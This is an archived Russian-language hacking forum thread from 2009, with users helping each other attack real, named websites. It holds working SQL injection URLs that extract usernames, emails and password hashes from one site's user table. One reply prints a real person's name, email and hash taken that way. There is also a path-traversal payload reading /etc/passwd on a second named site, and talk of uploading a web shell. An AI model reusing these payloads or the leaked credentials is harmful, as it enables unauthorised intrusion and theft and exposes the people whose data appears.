ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

14.06.2009, 11:27
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме: 2052341
Репутация:
95
|
|
на некотором сайте, при подстановки ' выводится следующая ошибка: Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'
подскажите, какая именно это уязвимость, к какой СУБД она относится?
|
|
|

14.06.2009, 11:35
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Сообщение от jecka3000
на некотором сайте, при подстановки ' выводится следующая ошибка: Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'
подскажите, какая именно это уязвимость, к какой СУБД она относится?
mysql, есть возможность проведения sql инъекции. Преебирай число столбцов (+order+by+...), дальше, если версия не третья, то можно из Бд вытащит данные.
|
|
|

14.06.2009, 11:45
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме: 2052341
Репутация:
95
|
|
wildshaman, смотри, вот кажись подобрал, дальше пытаюсь вытащить юзеров, БД ну и т.д. Но сейчас не выодит ни ошибки ни инфу, которую я хотел бы .......
УРЛ скинул в личку, посмотри плиз...)
|
|
|

14.06.2009, 11:51
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме: 4205500
Репутация:
930
|
|
если версия не третья, то можно из Бд вытащит данные.
Если третья, то тоже можно, но немного сложнее.
|
|
|

14.06.2009, 12:10
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Да, ошибся, там просто сложнее намного, с тройкой не привык еще работать 
|
|
|

14.06.2009, 12:37
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме: 2052341
Репутация:
95
|
|
wildshaman, спасибо за помощь, но всё же хочется добить эту скулю.....
мною был слставлен следующий запрос для вывода имен таблиц: _http://www.comingsoon.net/news.php?id=1+union+select+table_name,2+from+infor mation_schema.tables+where+table_schema=%27comings o_nextra%27
но к сожалению ничего хорошего я не увидел, подскажите, в чем ошибка.....
|
|
|

14.06.2009, 13:09
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
jecka3000, там переменная передается в несколько запросов, в которых количество столбцов для выборки разное. Это видно по ошибке
Но там так же двойной запрос (результат выборки одного передаются в другой), что мы можем использовать в своих гнусных целях
http://www.comingsoon.net/news.php?id=56269+and+1=2+union+select+(select+con cat_ws(0x2F,name,email,password)+from+NEX_USERS+li mit+0,1),2
Вывод в ошибке
Paul Oehler/poehler@nexcess.net/$1$oXa15J8g$2idU4zZjHnXPyYDu94w2C0
UPDATE:
Сообщение от jecka3000
select+table_name,2+from+information_schema.tables
Там 4 версия - information_schema в ней нет
Последний раз редактировалось ElteRUS; 14.06.2009 в 13:32..
|
|
|

14.06.2009, 13:49
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Я смотрю последнее время в теме тенденция всё усложнять. Двойные запросы неебические конструкции
http://www.comingsoon.net/news.php?id=99999999+union+select+concat_ws(0x2F,n ame,email,password),1+from+NEX_USERS+limit+0,1/*
|
|
|

14.06.2009, 19:43
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сообщение от SeNaP
Здравствуйте, подскажите пожалуйсто как можно залить шел через PHP иньекцию
Вот уязвимый сайт
http://www.cyl.ru/index.php?page=3&lang=../%00
Взял я его из раздела PHP иньекции.
Там уже залит шел, мне просто интеренсно, каким способом.... 
Сообщение от jokester
Это не инклуд там file()
Код:
http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

|
|
|

14.06.2009, 20:23
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Сообщение от Pashkela
Сообщение от jokester
Это не инклуд там file()
Код:
http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00

Pashkela и что ты нам показал? 
Последний раз редактировалось Grey; 14.06.2009 в 20:32..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|